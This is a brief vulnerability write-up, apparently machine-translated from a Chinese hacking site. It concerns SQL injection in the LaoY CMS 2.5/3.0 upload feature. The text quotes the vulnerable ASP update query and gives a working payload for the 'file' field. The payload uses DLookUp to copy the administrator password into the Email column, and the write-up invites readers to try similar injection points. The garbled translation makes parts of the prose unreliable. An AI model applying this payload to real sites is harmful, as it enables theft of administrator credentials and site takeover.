dlookup in sql injection in the storms database storms the administrator password in the application-vulnerability warning-the black bar safety net

2011-06-19T00:00:00
ID MYHACK58:62201130939
Type myhack58
Reporter 佚名
Modified 2011-06-19T00:00:00

Description

To the actual vulnerability, for example,that is, laoy old y 2. 5,3. 0 version,that upload injection vulnerability.

sql="Update "&tbname&"_User set UserFace = '"&Uprequest. Form("file")&"' where ID= "& LaoYID

Injection:

The file variable is changed:

abc',Email=DLookUp('admin_pass','Yao_admin', 'Id=1'),Sex='0

The email value is set to the administrator password,storm password successfully.

Other similar injected into the place also can try